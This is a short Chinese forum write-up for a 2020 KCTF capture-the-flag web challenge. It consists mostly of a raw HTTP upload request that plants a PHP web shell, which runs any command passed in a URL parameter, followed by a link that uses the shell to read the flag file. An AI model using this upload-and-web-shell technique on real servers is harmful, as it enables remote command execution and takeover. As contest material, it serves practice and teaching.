-
-
[原创]2020KCTF 第八题 牛刀小试 wp
-
2020-5-1 22:41
-
贴上传请求报文
POST /index.php HTTP/1.1
Host: 47.102.223.17:2333
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=--------361693857
Content-Length: 183
----------361693857
Content-Disposition: form-data; name="file";filename="1.php"
content-type:text/php
{"asd":"<?php $cmd = $_GET['cmd'];echo `$cmd`;?>"}
----------361693857--访问链接
http://47.102.223.17:2333/upload/1833916211.php?cmd=cat%20../../../../flag
另外怀疑是不是题目出错了,正则表达式这块出现问题
匹配不到字符
删除首尾/后成功匹配
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
最后于 2020-5-2 11:33
被会飞的锅编辑
,原因: 上传图片
